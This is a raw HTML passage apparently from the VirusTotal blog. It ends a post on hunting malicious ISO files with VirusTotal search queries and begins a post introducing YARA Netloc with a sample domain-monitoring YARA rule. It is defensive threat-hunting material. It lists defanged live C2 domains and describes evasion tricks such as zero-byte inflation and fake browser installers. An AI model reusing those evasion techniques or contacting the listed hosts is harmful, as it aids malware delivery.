underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage behaviour_files:".exe" not tag:contains-pe</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: 
transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">With this method you no longer depend on the “contains-pe” tag (which could be missed in some cases), and you can also discover ISOs with “hidden” executables, for example </span><a href="https://www.virustotal.com/gui/file/6424e5edad3565a1a2f339b8622d8b394ce0525678d099fbbeb18d5c1865098f/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">ISOs containing archives</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> that in turn contain executables. It is also possible to detect cases where an ISO file contains only a non-binary file, such as an LNK or a script, that drops and executes a malicious PE payload. 
</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">It is possible to identify ISO clusters for specific malware campaigns. For instance, you can get samples used in a </span><a href="https://unit42.paloaltonetworks.com/chromeloader-malware/#post-123828-_p26kzjrz0h87" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">ChromeLoader</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"> distribution campaign with the following name and size filters:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520name%253A%2522Your%2520File%2520Is%2520Ready%2520To%2520Download%2522%2520size%253A100Mb%252B/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage name:"Your File Is Ready To Download" 
size:100Mb+</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">Another interesting ISO cluster contains artificially zero-byte inflated executables, allowing attackers to compress the resulting ISO file from 300Mb to 400Kb:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijuk3PmOocSYIcmxSwUDzMKJDlX2zwALBIdhSKjHNmG-Hgbplxnq13If1pE5TKaPJ5h7cSMcJM5PpQO3vVjoHozdsyUf-NAgswbzoT6qerHzYAjc9AVesvsJH1XWWLtdxapjVfmSnOMsc0I62LPPeZrxr4B3SE6a-wdnZ2odY-9XA8eDOVTFhCXjMwCEM/s940/rep4.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="510" data-original-width="940" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEijuk3PmOocSYIcmxSwUDzMKJDlX2zwALBIdhSKjHNmG-Hgbplxnq13If1pE5TKaPJ5h7cSMcJM5PpQO3vVjoHozdsyUf-NAgswbzoT6qerHzYAjc9AVesvsJH1XWWLtdxapjVfmSnOMsc0I62LPPeZrxr4B3SE6a-wdnZ2odY-9XA8eDOVTFhCXjMwCEM/s16000/rep4.png" /></a><i style="color: black; font-size: 11pt;"> <a href="https://www.virustotal.com/gui/file/e89f916f41ba07edbe766fce7d270d8878c51c38f87f76cf191a73026478100a/relations" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; 
font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">Example</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> of ISO file with artificially inflated executable inside</span></i></div><p></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">The following query will help you find some of these examples:</span></p><div align="left" dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520size%253A300Mb%252B%2520size%253A316Mb-%2520p%253A3%252B%2520have%253Acompressed_parents/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage size:300Mb+ size:316Mb- p:3+ have:compressed_parents</span></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><br /></span></p><p dir="ltr" style="color: 
#1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">We also found something that appears to be a malware campaign distributing weaponized versions of legitimate software, including “</span><a href="https://github.com/Crypto-Notepad/Crypto-Notepad" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">Crypto Notepad</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">”, within ISO files. Examining one of the </span><a href="https://www.virustotal.com/gui/file/857ab1e6d35182286af818e82dcd7b39c44f547bb33158ff2a9ecfaa1ea4823f/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">samples</span></a><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">, we can see that the bundled .NET executable is also inflated with zero-bytes up to 313Mb. 
The main purpose of the code injected into the legitimate software is to download a remote binary for execution:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOpG5V6A3bfT8DdBcUp_sHcu6Kfsa4Z_rN8WtNrebhHmgLMIKysneCk4AYhEdZpu6q1sYBNZyd8rLeK1_Yhwuo5DSoFTP3IO04sSGAyWLKG5_rcsQMieh7K6alVhu6Tn9V9MMK_wP1uEHwuXWJuFXZ3fNZuWLME2VnXc-4lVcEfXEsahcVWogvxdhzVVY/s937/rep5.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="717" data-original-width="937" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjOpG5V6A3bfT8DdBcUp_sHcu6Kfsa4Z_rN8WtNrebhHmgLMIKysneCk4AYhEdZpu6q1sYBNZyd8rLeK1_Yhwuo5DSoFTP3IO04sSGAyWLKG5_rcsQMieh7K6alVhu6Tn9V9MMK_wP1uEHwuXWJuFXZ3fNZuWLME2VnXc-4lVcEfXEsahcVWogvxdhzVVY/s16000/rep5.png" /></a></div><p></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;"><span id="docs-internal-guid-b7e97272-7fff-caec-c124-f8ec699ea995"></span></span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="color: black; font-size: 11pt;">It is also capable of fetching remotely hosted PowerShell code and executing it:</span></p><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbTF7XntXENGEHZiugYMhWWDbZF_kI2UdD6yRWmsmGbgf5YdWGIP7hwbX9ME2RsmNZDqz4Jc4OAV27EELjHIVIeFAuB34VCUGFeCyup8_SmbShKSfZ7rv-6rkVguUsHPuSMNyh4N3a-rpYynN6m3AaII5oVlf9jcPTGk9wDDdm7ZujpHJwA6VghqGIBBM/s937/rep6.png" 
style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="519" data-original-width="937" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgbTF7XntXENGEHZiugYMhWWDbZF_kI2UdD6yRWmsmGbgf5YdWGIP7hwbX9ME2RsmNZDqz4Jc4OAV27EELjHIVIeFAuB34VCUGFeCyup8_SmbShKSfZ7rv-6rkVguUsHPuSMNyh4N3a-rpYynN6m3AaII5oVlf9jcPTGk9wDDdm7ZujpHJwA6VghqGIBBM/s16000/rep6.png" /></a></div><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><br /></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="'Google Sans',sans-serif" style="background-color: transparent; color: black; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration: none; vertical-align: baseline; white-space: pre;">We found hundreds of samples related to this campaign related to the following C2 hosts:</span></p><p dir="ltr" style="color: #1f1f1f; font-size: 10.5pt; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span id="docs-internal-guid-be0b0c48-7fff-03e4-7cf1-a18523a9276d"></span></p><ul style="color: #1f1f1f; font-size: 10.5pt; margin-bottom: 0px; margin-top: 0px; padding-inline-start: 48px;"><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/telegramdesktop.club/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; 
text-decoration: underline; vertical-align: baseline; white-space: pre;">telegramdesktop[.]club</span></a></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/telegramdesktop.digital/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">telegramdesktop[.]digital</span></a></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/fuckuavsystemsfewgqsg.live/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">fuckuavsystemsfewgqsg[.]live</span></a></p></li><li aria-level="1" dir="ltr" style="background-color: transparent; color: black; font-family: "Google Sans", sans-serif; font-size: 11pt; font-style: normal; 
font-variant: normal; font-weight: 400; list-style-type: disc; text-decoration: none; vertical-align: baseline; white-space: pre;"><p dir="ltr" role="presentation" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><a href="https://www.virustotal.com/gui/domain/installmarkets.hair/relations" style="text-decoration: none;"><span face="'Google Sans',sans-serif" style="-webkit-text-decoration-skip: none; background-color: transparent; color: #1155cc; font-size: 11pt; font-style: normal; font-variant: normal; font-weight: 400; text-decoration-skip-ink: none; text-decoration: underline; vertical-align: baseline; white-space: pre;">installmarkets[.]hair</span></a></p></li></ul><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2AzIqC5Om2vEXaaZ959MlOMeXs1Oq78jWE251J2Y__M3QeCCmO0yrpReUBcrzPtIJ2VkSm2XidBKjCAELGpPMqdYibZhTPViUj8p5YbLXJHNfkoYizs0TDpY73QkjBDa3VM-7vyH4akoWlKoWXfbxas0jdQpSM9NHlIXVSvcHUkcV5GIuSqJ1ZFOjBUM/s750/rep7.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="464" data-original-width="750" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj2AzIqC5Om2vEXaaZ959MlOMeXs1Oq78jWE251J2Y__M3QeCCmO0yrpReUBcrzPtIJ2VkSm2XidBKjCAELGpPMqdYibZhTPViUj8p5YbLXJHNfkoYizs0TDpY73QkjBDa3VM-7vyH4akoWlKoWXfbxas0jdQpSM9NHlIXVSvcHUkcV5GIuSqJ1ZFOjBUM/s16000/rep7.png" /></a></div><span id="docs-internal-guid-c758d4a4-7fff-7bdc-c3b6-368f26f5f304"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; text-align: center;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><i> installmarkets[.]hair relations with malicious samples</i></span></p></span></div><div><span style="font-size: 14.6667px; text-wrap: nowrap;"><br /></span></div><div><span id="docs-internal-guid-6f9bc29d-7fff-31f5-022f-bde72e0ff6b7"><p dir="ltr" 
style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Other than compressing artificially inflated files, another reason to distribute ISO files is </span><a href="https://twitter.com/kuermelecke/status/1552945269905530881" style="text-decoration-line: none;"><span style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline;">mimicking legitimate installation software</span></a><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"> packages, which you usually expect to be sizable. The following example uses a well known browser to find suspicious cases:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%3Afile%20tag%3Aisoimage%20name%3ABraveBrowserSetup/files" style="text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage name:BraveBrowserSetup</span></a></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; 
font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">The previous search results in a number of files with zero AV detections. However, further manual analysis reveals their maliciousness.</span></p><div><div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhcRUoOOkSQohQD5obrsCOV2Y6_A9UeNvSi8yC6T1feJfyKc_RBRzvwhcR3RnV_nrnvCDWK1FV01FsSbNYqFGfcnxWFmu9R-MflsqWCCtCOLVr9G1O4x1ILbrKz7T9BuYRT6Y2Gem9LtLomBl1R8l-EN5pEhdf6jcei6bFZVlGiUyAkk-F7Nfywihy0Fs/s942/rep8.png" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="863" data-original-width="942" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjhcRUoOOkSQohQD5obrsCOV2Y6_A9UeNvSi8yC6T1feJfyKc_RBRzvwhcR3RnV_nrnvCDWK1FV01FsSbNYqFGfcnxWFmu9R-MflsqWCCtCOLVr9G1O4x1ILbrKz7T9BuYRT6Y2Gem9LtLomBl1R8l-EN5pEhdf6jcei6bFZVlGiUyAkk-F7Nfywihy0Fs/s16000/rep8.png" /></a></div><span id="docs-internal-guid-b04858a6-7fff-e844-f671-32430709609a"><div style="text-align: center;"><span style="font-size: 11pt;"><i> Malicious samples with 0 AV detections mimicking Brave browser installer</i></span></div><div style="text-align: center;"><span style="font-size: 11pt; font-style: italic;"><br /></span></div></span></div><div><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">There are different ways to explore what are the main spreading vectors used to distribute malicious ISO files and their related infrastructure. 
For instance, the following query provides samples seen being hosted In-The-Wild:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520p%253A10%252B%2520have%253Aitw/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage p:10+ have:itw</span></a></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">You can refine the search to list samples seen being hosted in a specific host:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520p%253A10%252B%2520itw%253Acdn.discordapp.com/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage p:10+ itw:cdn.discordapp.com</span></a></div><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 
<span style="font-size: 11pt;">
0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;"><br /></span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Email spreading can be filtered using the “attachment” tag or “email_parents”; both provide pretty much the same results:</span></p><div align="left" dir="ltr" style="margin-left: 0pt;"><a href="https://www.virustotal.com/gui/search/entity%253Afile%2520tag%253Aisoimage%2520p%253A10%252B%2520(%2520tag%253Aattachment%2520OR%2520have%253Aemail_parents%2520)/files" style="font-size: medium; text-decoration-line: none; white-space-collapse: collapse;"><span face="Consolas, sans-serif" style="color: #1155cc; font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; text-decoration-line: underline; text-decoration-skip-ink: none; vertical-align: baseline; white-space-collapse: preserve;">entity:file tag:isoimage p:10+ (tag:attachment OR have:email_parents)</span></a></div><br /><h3 dir="ltr" style="line-height: 1.38; margin-bottom: 4pt; margin-top: 16pt;"><span face="Arial, sans-serif" style="color: #434343; font-size: 14pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-weight: 400; vertical-align: baseline;">Wrapping it up</span></h3><br /><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: 3pt 0pt 6pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Attackers are constantly rotating the file formats they use to deliver malware. 
This is done to increase the effectiveness of their campaigns and to avoid detection by security measures. The security community needs to be aware of the use of alternative file formats for malware delivery and to put more resources into stopping these new spreading methods. For example, although traditional file types, such as Word, Excel, and RTF, are still used for malware delivery, alternative formats, such as OneNote and ISO, are becoming increasingly popular.</span></p><p dir="ltr" style="background-color: white; line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt; padding: -3pt 0pt 6pt 0pt;"><span style="background-color: transparent; color: #1f1f1f; font-size: 10.5pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">As proof of the effectiveness of format rotation for attackers, the simple fact of bundling a malicious sample inside an ISO file seems to effectively decrease AV detections. We also observed poor detection in the first waves of malicious OneNote files, although this improved with time. </span></p><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">We suggest monitoring malware spreading trends and actively checking how your security stack responds, to proactively minimize infection risks. Also include in your analysis all logs to/from allowed legitimate sites, as they are regularly used for malware distribution; do not focus your anomaly detection exclusively on unknown traffic. 
</span></p><br /><p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span face="Arial, sans-serif" style="font-size: 11pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; vertical-align: baseline;">Happy hunting!</span></p></span></div></span></div></div></span></div></span>Vicente Díazhttp://www.blogger.com/profile/11514421601563728512noreply@blogger.com0tag:blogger.com,1999:blog-6871606241422173914.post-20923783706513312932023-07-24T12:39:00.005+02:002023-07-28T13:53:51.782+02:00Actionable Threat Intel (IV) - YARA beyond files: extending rules to network IoCs<div class="interval_12"> We are extremely excited to introduce <b>YARA Netloc</b>, a powerful new hunting feature that extends YARA supported entities from traditional files <b>to network infrastructure</b>, including <b>domains</b>, <b>URLs</b> and <b>IP addresses</b>. This opens endless possibilities and brings your hunting to a whole new level. Let’s get started!
</div>
<br>
<div class="central_img width_80 interval_12">
<img src="https://lh6.googleusercontent.com/fx89fxnBlCweg2ZfPHqau9I4LfUffPRlXNySb_YpaIRDtq8F-BCLmoTEnjQDoiuK49FsF20zh3As1t010gI3zrWti3B0LYCQq-0jv7EsRJdbIGlMfj4bD5tnR929IFZwRwoJgsYSljn3jD3CXtb-Z5dV_tJYmTMGEzV7gwe1VnFjtzGJNvsZ6qsopTO_F1PxUjd3JTIlGWkf0-k9ASkb4F1Up4aFnWR2fmTbsA" />
</div>
<br>
<h2 style="text-align: left;">Creating Network rules</h2>
<div class="interval_12">
<b>YARA Netloc</b> is based on extended functionality implemented for the “vt” YARA module. In particular, you will now find a new ".net" attribute specifically for network-related entities such as URLs, domains and IP addresses. <a href="https://developers.virustotal.com/docs/nethunt" target="_blank">Here you can find the full documentation</a>. Remember you can use the “vt” YARA module for any of your LiveHunt YARA rules.
</div>
<div class="interval_12">
Before we start working on a few examples it is important to highlight what resources you have available to get you quickly up to speed. First, our new <b><a href="https://blog.virustotal.com/2023/07/actionable-threat-intel-iii-introducing.html" target="_blank">YARA editor</a></b> offers several <b>templates</b> you can use to build your rules. Second, the whole community can benefit from VirusTotal’s community rules in our new <a href="https://github.com/VirusTotal/vt-public-crowdsourced-yara" target="_blank">crowdsourced <b>YARA GitHub repository</b></a>. The repository is split into four folders, each containing rules that match a different entity type (file, domain, IP or URL).
</div>
<div class="interval_12">
Let’s start with a first example rule. The “<b>New Livehunt Ruleset</b>” dropdown on the <a href="https://www.virustotal.com/gui/hunting/rulesets" target="_blank"><b>Livehunt</b></a> section now allows us to select what kind of YARA we want to create, depending on the entity we want to match against.
</div>
<br>
<div class="central_img width_30 interval_12">
<img src="https://lh3.googleusercontent.com/0XB4J3Xjs4qkRB8FZ7hcSYkTQizGxTLd6CHu_Vw3hXw6vB4IEO-B4RCP0dAuGqt3J9uV242rc-BtSOMOFzNw5P6qZwOEmavO8uuWU7JQ5DvEBchKoy_PZtfZU6WEpr3mawOvY6vTZRzb3gpnrKGvMwpiuLXSYIF6XzQNhwybkJWaSYWwHsbaE7-OiZxbhBYWMZC4miTGEIM9QusLmHuBkBeyxxafIfbYjZeL8Q" />
</div>
<br>
<div class="interval_12">
Let’s select “<b>New ruleset matching against Domains</b>” to deploy a rule to track if any of our domains is serving malware without our knowledge. We will use the “<b>Domain serving malicious files</b>” <b>template</b> available on the YARA editor.
</div>
<br>
<div class="central_img width_40 interval_12">
<img src="https://lh3.googleusercontent.com/6uSFICpWJ_sMfaSNF_ggW5664ailkV1KFR3eqP3-B2xYBLuIdF67szX3ouh0QFkwSfN1cY09RKruVSdjSOsvAeW9MBIJIbAUMF1fL82qeVaBST7KdzTWO7wFeGF8lD1FvrTVQEBkK6TxoPQDY_joQi8ny8f7hLcTWFYptLkFQN-SW0rROC4F941SzLl8ej7gHPWpT2_93q-ZERSV-EoOYY5t1aEO04kwWyJkXw" />
</div>
<br>
<div class="my-yara-code interval_12">
<mark class="blue">import</mark> <mark class="red">"vt"</mark><br/><br/>
<mark class="blue">rule</mark> malware_distribution <mark class="dark-blue">{</mark><br/>
<mark class="blue">meta</mark>:<br/>
description = <mark class="red">"Detects if my infrastructure is being used to distribute malware or malicious domains are impersonating my legitimate domain with the same purpose."</mark><br/>
category = <mark class="red">"infra-monitoring"</mark><br/>
references = <mark class="red">"https://www.virustotal.com/gui/search/entity%253Adomain%2520domain%253Atelegram.com%2520downloaded_files_max_detections%253A5%252B/domains"</mark><br/>
creation_date = <mark class="red">"2023-07-19"</mark><br/>
last_modified = <mark class="red">"2023-07-19"</mark><br/>
target_entity = <mark class="red">"domains"</mark><br/>
<mark class="blue">condition</mark>:<br/>
vt.net.domain.raw <mark class="blue">icontains</mark> <mark class="red">"telegram.com"</mark> <mark class="blue">and</mark><br/>
vt.net.domain.downloaded_file.analysis_stats.malicious >= <mark class="green">5</mark> <br/>
<mark class="dark-blue">}</mark>
</div>
<div class="interval_12">
